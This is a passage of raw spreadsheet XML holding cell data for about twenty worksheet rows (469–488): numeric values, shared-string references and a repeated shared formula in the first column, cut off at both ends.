        <v>30</v>
      </c>
      <c r="F469" s="14"/>
      <c r="G469" s="29">
        <v>3.0</v>
      </c>
      <c r="H469" s="29">
        <v>392.0</v>
      </c>
      <c r="I469" s="29">
        <v>12139.0</v>
      </c>
      <c r="J469" s="15"/>
      <c r="K469" s="29">
        <v>12139.0</v>
      </c>
      <c r="L469" s="15"/>
      <c r="M469" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N469" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O469" s="29">
        <v>1.0</v>
      </c>
      <c r="P469" s="29">
        <v>0.0</v>
      </c>
      <c r="Q469" s="15"/>
      <c r="R469" s="15"/>
      <c r="S469" s="15"/>
      <c r="T469" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U469" s="5"/>
      <c r="V469" s="5"/>
      <c r="W469" s="47"/>
      <c r="X469" s="45"/>
      <c r="Y469" s="45"/>
      <c r="Z469" s="38" t="s">
        <v>2462</v>
      </c>
      <c r="AA469" s="39" t="s">
        <v>2463</v>
      </c>
      <c r="AB469" s="38" t="s">
        <v>2464</v>
      </c>
      <c r="AC469" s="40">
        <v>55037.0</v>
      </c>
      <c r="AD469" s="5"/>
      <c r="AE469" s="14"/>
      <c r="AF469" s="14"/>
    </row>
    <row r="470">
      <c r="A470" s="6">
        <f t="shared" si="1"/>
        <v>0.07135994356</v>
      </c>
      <c r="B470" s="29">
        <v>1.0</v>
      </c>
      <c r="C470" s="29">
        <v>78601.0</v>
      </c>
      <c r="D470" s="14"/>
      <c r="E470" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F470" s="14"/>
      <c r="G470" s="29">
        <v>5.0</v>
      </c>
      <c r="H470" s="29">
        <v>789.0</v>
      </c>
      <c r="I470" s="29">
        <v>64769.0</v>
      </c>
      <c r="J470" s="15"/>
      <c r="K470" s="29">
        <v>8340.0</v>
      </c>
      <c r="L470" s="15"/>
      <c r="M470" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N470" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O470" s="29">
        <v>8.0</v>
      </c>
      <c r="P470" s="29">
        <v>2.0</v>
      </c>
      <c r="Q470" s="15"/>
      <c r="R470" s="15"/>
      <c r="S470" s="15"/>
      <c r="T470" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U470" s="5"/>
      <c r="V470" s="5"/>
      <c r="W470" s="47"/>
      <c r="X470" s="45"/>
      <c r="Y470" s="45"/>
      <c r="Z470" s="38" t="s">
        <v>2465</v>
      </c>
      <c r="AA470" s="39" t="s">
        <v>2466</v>
      </c>
      <c r="AB470" s="38" t="s">
        <v>1451</v>
      </c>
      <c r="AC470" s="40">
        <v>77555.0</v>
      </c>
      <c r="AD470" s="5"/>
      <c r="AE470" s="14"/>
      <c r="AF470" s="14"/>
    </row>
    <row r="471">
      <c r="A471" s="6">
        <f t="shared" si="1"/>
        <v>0.9871428429</v>
      </c>
      <c r="B471" s="29">
        <v>1.0</v>
      </c>
      <c r="C471" s="15"/>
      <c r="D471" s="14"/>
      <c r="E471" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F471" s="14"/>
      <c r="G471" s="29">
        <v>0.0</v>
      </c>
      <c r="H471" s="29">
        <v>320.0</v>
      </c>
      <c r="I471" s="29">
        <v>264472.0</v>
      </c>
      <c r="J471" s="15"/>
      <c r="K471" s="15"/>
      <c r="L471" s="15"/>
      <c r="M471" s="14"/>
      <c r="N471" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O471" s="29">
        <v>2.0</v>
      </c>
      <c r="P471" s="29">
        <v>1.0</v>
      </c>
      <c r="Q471" s="15"/>
      <c r="R471" s="15"/>
      <c r="S471" s="15"/>
      <c r="T471" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U471" s="5"/>
      <c r="V471" s="5"/>
      <c r="W471" s="47"/>
      <c r="X471" s="45"/>
      <c r="Y471" s="45"/>
      <c r="Z471" s="38" t="s">
        <v>2467</v>
      </c>
      <c r="AA471" s="39" t="s">
        <v>2468</v>
      </c>
      <c r="AB471" s="38" t="s">
        <v>2469</v>
      </c>
      <c r="AC471" s="40">
        <v>254120.0</v>
      </c>
      <c r="AD471" s="5"/>
      <c r="AE471" s="14"/>
      <c r="AF471" s="14"/>
    </row>
    <row r="472">
      <c r="A472" s="6">
        <f t="shared" si="1"/>
        <v>0.03685271628</v>
      </c>
      <c r="B472" s="29">
        <v>1.0</v>
      </c>
      <c r="C472" s="14"/>
      <c r="D472" s="14"/>
      <c r="E472" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F472" s="14"/>
      <c r="G472" s="29">
        <v>0.0</v>
      </c>
      <c r="H472" s="29">
        <v>774.0</v>
      </c>
      <c r="I472" s="29">
        <v>139604.0</v>
      </c>
      <c r="J472" s="15"/>
      <c r="K472" s="15"/>
      <c r="L472" s="15"/>
      <c r="M472" s="14"/>
      <c r="N472" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O472" s="29">
        <v>1.0</v>
      </c>
      <c r="P472" s="29">
        <v>1.0</v>
      </c>
      <c r="Q472" s="15"/>
      <c r="R472" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S472" s="15"/>
      <c r="T472" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U472" s="5"/>
      <c r="V472" s="5"/>
      <c r="W472" s="47"/>
      <c r="X472" s="45"/>
      <c r="Y472" s="45"/>
      <c r="Z472" s="38" t="s">
        <v>2470</v>
      </c>
      <c r="AA472" s="39" t="s">
        <v>2471</v>
      </c>
      <c r="AB472" s="38" t="s">
        <v>1184</v>
      </c>
      <c r="AC472" s="40">
        <v>151521.0</v>
      </c>
      <c r="AD472" s="5"/>
      <c r="AE472" s="14"/>
      <c r="AF472" s="14"/>
    </row>
    <row r="473">
      <c r="A473" s="6">
        <f t="shared" si="1"/>
        <v>0.2879058563</v>
      </c>
      <c r="B473" s="29">
        <v>1.0</v>
      </c>
      <c r="C473" s="14"/>
      <c r="D473" s="14"/>
      <c r="E473" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F473" s="14"/>
      <c r="G473" s="29">
        <v>3.0</v>
      </c>
      <c r="H473" s="29">
        <v>2684.0</v>
      </c>
      <c r="I473" s="29">
        <v>116121.0</v>
      </c>
      <c r="J473" s="15"/>
      <c r="K473" s="15"/>
      <c r="L473" s="15"/>
      <c r="M473" s="14"/>
      <c r="N473" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O473" s="29">
        <v>1.0</v>
      </c>
      <c r="P473" s="29">
        <v>3.0</v>
      </c>
      <c r="Q473" s="15"/>
      <c r="R473" s="15"/>
      <c r="S473" s="15"/>
      <c r="T473" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U473" s="5"/>
      <c r="V473" s="5"/>
      <c r="W473" s="47"/>
      <c r="X473" s="45"/>
      <c r="Y473" s="45"/>
      <c r="Z473" s="38" t="s">
        <v>2472</v>
      </c>
      <c r="AA473" s="39" t="s">
        <v>2473</v>
      </c>
      <c r="AB473" s="38" t="s">
        <v>2474</v>
      </c>
      <c r="AC473" s="40">
        <v>197693.0</v>
      </c>
      <c r="AD473" s="5"/>
      <c r="AE473" s="14"/>
      <c r="AF473" s="14"/>
    </row>
    <row r="474">
      <c r="A474" s="6">
        <f t="shared" si="1"/>
        <v>0.313825985</v>
      </c>
      <c r="B474" s="29">
        <v>1.0</v>
      </c>
      <c r="C474" s="29">
        <v>187233.0</v>
      </c>
      <c r="D474" s="14"/>
      <c r="E474" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F474" s="14"/>
      <c r="G474" s="29">
        <v>0.0</v>
      </c>
      <c r="H474" s="29">
        <v>2694.0</v>
      </c>
      <c r="I474" s="29">
        <v>124588.0</v>
      </c>
      <c r="J474" s="15"/>
      <c r="K474" s="15"/>
      <c r="L474" s="15"/>
      <c r="M474" s="15"/>
      <c r="N474" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O474" s="29">
        <v>4.0</v>
      </c>
      <c r="P474" s="29">
        <v>5.0</v>
      </c>
      <c r="Q474" s="15"/>
      <c r="R474" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S474" s="15"/>
      <c r="T474" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U474" s="5"/>
      <c r="V474" s="5"/>
      <c r="W474" s="47"/>
      <c r="X474" s="45"/>
      <c r="Y474" s="45"/>
      <c r="Z474" s="38" t="s">
        <v>2475</v>
      </c>
      <c r="AA474" s="39" t="s">
        <v>2476</v>
      </c>
      <c r="AB474" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC474" s="40">
        <v>187220.0</v>
      </c>
      <c r="AD474" s="5"/>
      <c r="AE474" s="14"/>
      <c r="AF474" s="14"/>
    </row>
    <row r="475">
      <c r="A475" s="6">
        <f t="shared" si="1"/>
        <v>0.5370661335</v>
      </c>
      <c r="B475" s="29">
        <v>1.0</v>
      </c>
      <c r="C475" s="29">
        <v>58706.0</v>
      </c>
      <c r="D475" s="14"/>
      <c r="E475" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F475" s="14"/>
      <c r="G475" s="29">
        <v>32.0</v>
      </c>
      <c r="H475" s="29">
        <v>4130.0</v>
      </c>
      <c r="I475" s="29">
        <v>31625.0</v>
      </c>
      <c r="J475" s="15"/>
      <c r="K475" s="29">
        <v>31625.0</v>
      </c>
      <c r="L475" s="15"/>
      <c r="M475" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N475" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O475" s="29">
        <v>2.0</v>
      </c>
      <c r="P475" s="29">
        <v>8.0</v>
      </c>
      <c r="Q475" s="15"/>
      <c r="R475" s="15"/>
      <c r="S475" s="15"/>
      <c r="T475" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U475" s="5"/>
      <c r="V475" s="5"/>
      <c r="W475" s="47"/>
      <c r="X475" s="45"/>
      <c r="Y475" s="45"/>
      <c r="Z475" s="38" t="s">
        <v>2477</v>
      </c>
      <c r="AA475" s="39" t="s">
        <v>2478</v>
      </c>
      <c r="AB475" s="38" t="s">
        <v>2479</v>
      </c>
      <c r="AC475" s="40">
        <v>58704.0</v>
      </c>
      <c r="AD475" s="5"/>
      <c r="AE475" s="14"/>
      <c r="AF475" s="14"/>
    </row>
    <row r="476">
      <c r="A476" s="6">
        <f t="shared" si="1"/>
        <v>0.913422751</v>
      </c>
      <c r="B476" s="29">
        <v>1.0</v>
      </c>
      <c r="C476" s="15"/>
      <c r="D476" s="14"/>
      <c r="E476" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F476" s="14"/>
      <c r="G476" s="29">
        <v>3.0</v>
      </c>
      <c r="H476" s="29">
        <v>395.0</v>
      </c>
      <c r="I476" s="29">
        <v>199325.0</v>
      </c>
      <c r="J476" s="15"/>
      <c r="K476" s="29">
        <v>6253.0</v>
      </c>
      <c r="L476" s="15"/>
      <c r="M476" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N476" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O476" s="29">
        <v>1.0</v>
      </c>
      <c r="P476" s="29">
        <v>1.0</v>
      </c>
      <c r="Q476" s="15"/>
      <c r="R476" s="15"/>
      <c r="S476" s="15"/>
      <c r="T476" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U476" s="5"/>
      <c r="V476" s="5"/>
      <c r="W476" s="47"/>
      <c r="X476" s="45"/>
      <c r="Y476" s="45"/>
      <c r="Z476" s="38" t="s">
        <v>2480</v>
      </c>
      <c r="AA476" s="39" t="s">
        <v>2481</v>
      </c>
      <c r="AB476" s="38" t="s">
        <v>2482</v>
      </c>
      <c r="AC476" s="40">
        <v>203388.0</v>
      </c>
      <c r="AD476" s="5"/>
      <c r="AE476" s="14"/>
      <c r="AF476" s="14"/>
    </row>
    <row r="477">
      <c r="A477" s="6">
        <f t="shared" si="1"/>
        <v>0.5007371655</v>
      </c>
      <c r="B477" s="29">
        <v>1.0</v>
      </c>
      <c r="C477" s="29">
        <v>211855.0</v>
      </c>
      <c r="D477" s="14"/>
      <c r="E477" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F477" s="14"/>
      <c r="G477" s="29">
        <v>8.0</v>
      </c>
      <c r="H477" s="29">
        <v>49623.0</v>
      </c>
      <c r="I477" s="29">
        <v>210145.0</v>
      </c>
      <c r="J477" s="15"/>
      <c r="K477" s="29">
        <v>221819.0</v>
      </c>
      <c r="L477" s="15"/>
      <c r="M477" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N477" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O477" s="29">
        <v>3.0</v>
      </c>
      <c r="P477" s="29">
        <v>1.0</v>
      </c>
      <c r="Q477" s="15"/>
      <c r="R477" s="15"/>
      <c r="S477" s="15"/>
      <c r="T477" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U477" s="5"/>
      <c r="V477" s="5"/>
      <c r="W477" s="47"/>
      <c r="X477" s="45"/>
      <c r="Y477" s="45"/>
      <c r="Z477" s="38" t="s">
        <v>2483</v>
      </c>
      <c r="AA477" s="39" t="s">
        <v>2484</v>
      </c>
      <c r="AB477" s="38" t="s">
        <v>2485</v>
      </c>
      <c r="AC477" s="40">
        <v>211826.0</v>
      </c>
      <c r="AD477" s="5"/>
      <c r="AE477" s="14"/>
      <c r="AF477" s="14"/>
    </row>
    <row r="478">
      <c r="A478" s="6">
        <f t="shared" si="1"/>
        <v>0.1585327866</v>
      </c>
      <c r="B478" s="29">
        <v>1.0</v>
      </c>
      <c r="C478" s="29">
        <v>239103.0</v>
      </c>
      <c r="D478" s="14"/>
      <c r="E478" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F478" s="14"/>
      <c r="G478" s="29">
        <v>1.0</v>
      </c>
      <c r="H478" s="29">
        <v>327.0</v>
      </c>
      <c r="I478" s="29">
        <v>243584.0</v>
      </c>
      <c r="J478" s="15"/>
      <c r="K478" s="15"/>
      <c r="L478" s="15"/>
      <c r="M478" s="15"/>
      <c r="N478" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O478" s="29">
        <v>1.0</v>
      </c>
      <c r="P478" s="29">
        <v>3.0</v>
      </c>
      <c r="Q478" s="15"/>
      <c r="R478" s="15"/>
      <c r="S478" s="15"/>
      <c r="T478" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U478" s="5"/>
      <c r="V478" s="5"/>
      <c r="W478" s="47"/>
      <c r="X478" s="45"/>
      <c r="Y478" s="45"/>
      <c r="Z478" s="38" t="s">
        <v>2486</v>
      </c>
      <c r="AA478" s="39" t="s">
        <v>2487</v>
      </c>
      <c r="AB478" s="38" t="s">
        <v>2488</v>
      </c>
      <c r="AC478" s="40">
        <v>239100.0</v>
      </c>
      <c r="AD478" s="5"/>
      <c r="AE478" s="14"/>
      <c r="AF478" s="14"/>
    </row>
    <row r="479">
      <c r="A479" s="6">
        <f t="shared" si="1"/>
        <v>0.005433686257</v>
      </c>
      <c r="B479" s="29">
        <v>1.0</v>
      </c>
      <c r="C479" s="14"/>
      <c r="D479" s="14"/>
      <c r="E479" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F479" s="14"/>
      <c r="G479" s="29">
        <v>-1.0</v>
      </c>
      <c r="H479" s="29">
        <v>167.0</v>
      </c>
      <c r="I479" s="29">
        <v>67362.0</v>
      </c>
      <c r="J479" s="15"/>
      <c r="K479" s="29">
        <v>6253.0</v>
      </c>
      <c r="L479" s="15"/>
      <c r="M479" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N479" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O479" s="29">
        <v>2.0</v>
      </c>
      <c r="P479" s="29">
        <v>7.0</v>
      </c>
      <c r="Q479" s="15"/>
      <c r="R479" s="15"/>
      <c r="S479" s="15"/>
      <c r="T479" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U479" s="5"/>
      <c r="V479" s="5"/>
      <c r="W479" s="47"/>
      <c r="X479" s="45"/>
      <c r="Y479" s="45"/>
      <c r="Z479" s="38" t="s">
        <v>2489</v>
      </c>
      <c r="AA479" s="39" t="s">
        <v>2490</v>
      </c>
      <c r="AB479" s="38" t="s">
        <v>2491</v>
      </c>
      <c r="AC479" s="40">
        <v>248732.0</v>
      </c>
      <c r="AD479" s="5"/>
      <c r="AE479" s="14"/>
      <c r="AF479" s="14"/>
    </row>
    <row r="480">
      <c r="A480" s="6">
        <f t="shared" si="1"/>
        <v>0.5801330835</v>
      </c>
      <c r="B480" s="29">
        <v>1.0</v>
      </c>
      <c r="C480" s="29">
        <v>178683.0</v>
      </c>
      <c r="D480" s="14"/>
      <c r="E480" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F480" s="14"/>
      <c r="G480" s="29">
        <v>79.0</v>
      </c>
      <c r="H480" s="29">
        <v>18182.0</v>
      </c>
      <c r="I480" s="29">
        <v>169586.0</v>
      </c>
      <c r="J480" s="15"/>
      <c r="K480" s="15"/>
      <c r="L480" s="15"/>
      <c r="M480" s="15"/>
      <c r="N480" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O480" s="29">
        <v>8.0</v>
      </c>
      <c r="P480" s="29">
        <v>7.0</v>
      </c>
      <c r="Q480" s="15"/>
      <c r="R480" s="15"/>
      <c r="S480" s="15"/>
      <c r="T480" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U480" s="5"/>
      <c r="V480" s="5"/>
      <c r="W480" s="47"/>
      <c r="X480" s="45"/>
      <c r="Y480" s="45"/>
      <c r="Z480" s="38" t="s">
        <v>2492</v>
      </c>
      <c r="AA480" s="39" t="s">
        <v>2493</v>
      </c>
      <c r="AB480" s="38" t="s">
        <v>2494</v>
      </c>
      <c r="AC480" s="40">
        <v>178682.0</v>
      </c>
      <c r="AD480" s="5"/>
      <c r="AE480" s="14"/>
      <c r="AF480" s="14"/>
    </row>
    <row r="481">
      <c r="A481" s="6">
        <f t="shared" si="1"/>
        <v>0.4255738343</v>
      </c>
      <c r="B481" s="29">
        <v>1.0</v>
      </c>
      <c r="C481" s="14"/>
      <c r="D481" s="14"/>
      <c r="E481" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F481" s="14"/>
      <c r="G481" s="29">
        <v>0.0</v>
      </c>
      <c r="H481" s="29">
        <v>112.0</v>
      </c>
      <c r="I481" s="29">
        <v>213517.0</v>
      </c>
      <c r="J481" s="15"/>
      <c r="K481" s="29">
        <v>213517.0</v>
      </c>
      <c r="L481" s="15"/>
      <c r="M481" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N481" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O481" s="29">
        <v>1.0</v>
      </c>
      <c r="P481" s="29">
        <v>0.0</v>
      </c>
      <c r="Q481" s="15"/>
      <c r="R481" s="15"/>
      <c r="S481" s="15"/>
      <c r="T481" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U481" s="5"/>
      <c r="V481" s="5"/>
      <c r="W481" s="45"/>
      <c r="X481" s="45"/>
      <c r="Y481" s="45"/>
      <c r="Z481" s="38" t="s">
        <v>2495</v>
      </c>
      <c r="AA481" s="39" t="s">
        <v>2496</v>
      </c>
      <c r="AB481" s="38" t="s">
        <v>2497</v>
      </c>
      <c r="AC481" s="40">
        <v>214472.0</v>
      </c>
      <c r="AD481" s="5"/>
      <c r="AE481" s="14"/>
      <c r="AF481" s="14"/>
    </row>
    <row r="482">
      <c r="A482" s="6">
        <f t="shared" si="1"/>
        <v>0.8349513705</v>
      </c>
      <c r="B482" s="29">
        <v>1.0</v>
      </c>
      <c r="C482" s="14"/>
      <c r="D482" s="14"/>
      <c r="E482" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F482" s="14"/>
      <c r="G482" s="29">
        <v>3.0</v>
      </c>
      <c r="H482" s="29">
        <v>4438.0</v>
      </c>
      <c r="I482" s="29">
        <v>82861.0</v>
      </c>
      <c r="J482" s="15"/>
      <c r="K482" s="29">
        <v>82861.0</v>
      </c>
      <c r="L482" s="15"/>
      <c r="M482" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N482" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O482" s="29">
        <v>0.0</v>
      </c>
      <c r="P482" s="29">
        <v>6.0</v>
      </c>
      <c r="Q482" s="15"/>
      <c r="R482" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S482" s="15"/>
      <c r="T482" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U482" s="5"/>
      <c r="V482" s="5"/>
      <c r="W482" s="47"/>
      <c r="X482" s="45"/>
      <c r="Y482" s="45"/>
      <c r="Z482" s="38" t="s">
        <v>2498</v>
      </c>
      <c r="AA482" s="39" t="s">
        <v>2499</v>
      </c>
      <c r="AB482" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC482" s="40">
        <v>103040.0</v>
      </c>
      <c r="AD482" s="5"/>
      <c r="AE482" s="14"/>
      <c r="AF482" s="14"/>
    </row>
    <row r="483">
      <c r="A483" s="6">
        <f t="shared" si="1"/>
        <v>0.340791957</v>
      </c>
      <c r="B483" s="29">
        <v>1.0</v>
      </c>
      <c r="C483" s="15"/>
      <c r="D483" s="14"/>
      <c r="E483" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F483" s="14"/>
      <c r="G483" s="29">
        <v>2.0</v>
      </c>
      <c r="H483" s="29">
        <v>3193.0</v>
      </c>
      <c r="I483" s="29">
        <v>112468.0</v>
      </c>
      <c r="J483" s="15"/>
      <c r="K483" s="15"/>
      <c r="L483" s="15"/>
      <c r="M483" s="15"/>
      <c r="N483" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O483" s="29">
        <v>1.0</v>
      </c>
      <c r="P483" s="29">
        <v>3.0</v>
      </c>
      <c r="Q483" s="15"/>
      <c r="R483" s="15"/>
      <c r="S483" s="15"/>
      <c r="T483" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U483" s="5"/>
      <c r="V483" s="5"/>
      <c r="W483" s="47"/>
      <c r="X483" s="45"/>
      <c r="Y483" s="45"/>
      <c r="Z483" s="38" t="s">
        <v>2500</v>
      </c>
      <c r="AA483" s="39" t="s">
        <v>2501</v>
      </c>
      <c r="AB483" s="38" t="s">
        <v>2502</v>
      </c>
      <c r="AC483" s="40">
        <v>184461.0</v>
      </c>
      <c r="AD483" s="5"/>
      <c r="AE483" s="14"/>
      <c r="AF483" s="14"/>
    </row>
    <row r="484">
      <c r="A484" s="6">
        <f t="shared" si="1"/>
        <v>0.2626265776</v>
      </c>
      <c r="B484" s="29">
        <v>1.0</v>
      </c>
      <c r="C484" s="14"/>
      <c r="D484" s="14"/>
      <c r="E484" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F484" s="14"/>
      <c r="G484" s="29">
        <v>2.0</v>
      </c>
      <c r="H484" s="29">
        <v>395.0</v>
      </c>
      <c r="I484" s="29">
        <v>83641.0</v>
      </c>
      <c r="J484" s="15"/>
      <c r="K484" s="15"/>
      <c r="L484" s="15"/>
      <c r="M484" s="14"/>
      <c r="N484" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O484" s="29">
        <v>0.0</v>
      </c>
      <c r="P484" s="29">
        <v>3.0</v>
      </c>
      <c r="Q484" s="15"/>
      <c r="R484" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S484" s="15"/>
      <c r="T484" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U484" s="5"/>
      <c r="V484" s="5"/>
      <c r="W484" s="47"/>
      <c r="X484" s="45"/>
      <c r="Y484" s="45"/>
      <c r="Z484" s="38" t="s">
        <v>2503</v>
      </c>
      <c r="AA484" s="39" t="s">
        <v>2504</v>
      </c>
      <c r="AB484" s="38" t="s">
        <v>2505</v>
      </c>
      <c r="AC484" s="40">
        <v>152260.0</v>
      </c>
      <c r="AD484" s="5"/>
      <c r="AE484" s="14"/>
      <c r="AF484" s="14"/>
    </row>
    <row r="485">
      <c r="A485" s="6">
        <f t="shared" si="1"/>
        <v>0.2963397358</v>
      </c>
      <c r="B485" s="29">
        <v>1.0</v>
      </c>
      <c r="C485" s="15"/>
      <c r="D485" s="14"/>
      <c r="E485" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F485" s="14"/>
      <c r="G485" s="29">
        <v>1.0</v>
      </c>
      <c r="H485" s="29">
        <v>215.0</v>
      </c>
      <c r="I485" s="29">
        <v>10284.0</v>
      </c>
      <c r="J485" s="15"/>
      <c r="K485" s="29">
        <v>60713.0</v>
      </c>
      <c r="L485" s="15"/>
      <c r="M485" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N485" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O485" s="29">
        <v>2.0</v>
      </c>
      <c r="P485" s="29">
        <v>1.0</v>
      </c>
      <c r="Q485" s="15"/>
      <c r="R485" s="15"/>
      <c r="S485" s="15"/>
      <c r="T485" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U485" s="5"/>
      <c r="V485" s="5"/>
      <c r="W485" s="47"/>
      <c r="X485" s="45"/>
      <c r="Y485" s="45"/>
      <c r="Z485" s="38" t="s">
        <v>2506</v>
      </c>
      <c r="AA485" s="39" t="s">
        <v>2507</v>
      </c>
      <c r="AB485" s="38" t="s">
        <v>2508</v>
      </c>
      <c r="AC485" s="40">
        <v>15484.0</v>
      </c>
      <c r="AD485" s="5"/>
      <c r="AE485" s="14"/>
      <c r="AF485" s="14"/>
    </row>
    <row r="486">
      <c r="A486" s="6">
        <f t="shared" si="1"/>
        <v>0.7665535206</v>
      </c>
      <c r="B486" s="29">
        <v>1.0</v>
      </c>
      <c r="C486" s="29">
        <v>154740.0</v>
      </c>
      <c r="D486" s="14"/>
      <c r="E486" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F486" s="14"/>
      <c r="G486" s="29">
        <v>2.0</v>
      </c>
      <c r="H486" s="29">
        <v>660.0</v>
      </c>
      <c r="I486" s="29">
        <v>12253.0</v>
      </c>
      <c r="J486" s="15"/>
      <c r="K486" s="15"/>
      <c r="L486" s="15"/>
      <c r="M486" s="15"/>
      <c r="N486" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O486" s="29">
        <v>1.0</v>
      </c>
      <c r="P486" s="29">
        <v>1.0</v>
      </c>
      <c r="Q486" s="15"/>
      <c r="R486" s="15"/>
      <c r="S486" s="15"/>
      <c r="T486" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U486" s="5"/>
      <c r="V486" s="5"/>
      <c r="W486" s="47"/>
      <c r="X486" s="45"/>
      <c r="Y486" s="45"/>
      <c r="Z486" s="38" t="s">
        <v>2509</v>
      </c>
      <c r="AA486" s="39" t="s">
        <v>2510</v>
      </c>
      <c r="AB486" s="38" t="s">
        <v>2511</v>
      </c>
      <c r="AC486" s="40">
        <v>154736.0</v>
      </c>
      <c r="AD486" s="5"/>
      <c r="AE486" s="14"/>
      <c r="AF486" s="14"/>
    </row>
    <row r="487">
      <c r="A487" s="6">
        <f t="shared" si="1"/>
        <v>0.5253935453</v>
      </c>
      <c r="B487" s="29">
        <v>1.0</v>
      </c>
      <c r="C487" s="29">
        <v>19801.0</v>
      </c>
      <c r="D487" s="14"/>
      <c r="E487" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F487" s="14"/>
      <c r="G487" s="29">
        <v>58.0</v>
      </c>
      <c r="H487" s="29">
        <v>11154.0</v>
      </c>
      <c r="I487" s="29">
        <v>12407.0</v>
      </c>
      <c r="J487" s="15"/>
      <c r="K487" s="29">
        <v>21234.0</v>
      </c>
      <c r="L487" s="15"/>
      <c r="M487" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N487" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O487" s="29">
        <v>4.0</v>
      </c>
      <c r="P487" s="29">
        <v>5.0</v>
      </c>
      <c r="Q487" s="15"/>
      <c r="R487" s="15"/>
      <c r="S487" s="15"/>
      <c r="T487" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U487" s="5"/>
      <c r="V487" s="5"/>
      <c r="W487" s="47"/>
      <c r="X487" s="45"/>
      <c r="Y487" s="45"/>
      <c r="Z487" s="38" t="s">
        <v>2512</v>
      </c>
      <c r="AA487" s="39" t="s">
        <v>2513</v>
      </c>
      <c r="AB487" s="38" t="s">
        <v>2514</v>
      </c>
      <c r="AC487" s="40">
        <v>19155.0</v>
      </c>
      <c r="AD487" s="5"/>
      <c r="AE487" s="14"/>
      <c r="AF487" s="14"/>
    </row>
    <row r="488">
      <c r="A488" s="6">
        <f t="shared" si="1"/>
        <v>0.26916124</v>
      </c>
      <c r="B488" s="29">
        <v>1.0</v>
      </c>
      <c r="C488" s="15"/>
      <c r="D488" s="14"/>
      <c r="E488" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F488" s="14"/>
      <c r="G488" s="29">
        <v>4.0</v>
      </c>
      <c r="H488" s="29">
        <v>3605.0</v>
      </c>
      <c r="I488" s="29">
        <v>121369.0</v>
      </c>
      <c r="J488" s="15"/>
      <c r="K488" s="29">
        <v>98538.0</v>
      </c>
      <c r="L488" s="15"/>
      <c r="M488" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N488" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O488" s="29">
        <v>2.0</v>
      </c>
      <c r="P488" s="29">
        <v>1.0</v>
      </c>
      <c r="Q488" s="15"/>
      <c r="R488" s="15"/>
      <c r="S488" s="15"/>
      <c r="T488" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U488" s="5"/>
      <c r="V488" s="5"/>
      <c r="W488" s="47"/>
      <c r="X488" s="45"/>
      <c r="Y488" s="45"/>
      <c r="Z488" s="38" t="s">
        <v>2515</v>
      </c>
      <c r="AA488" s="39" t="s">
        <v>2516</v>
      </c>
      <c r="AB488" s="38" t="s">
        <v>2517</v>
      </c>
      <c r="AC488" s="40">
        <v>133808.0</v>
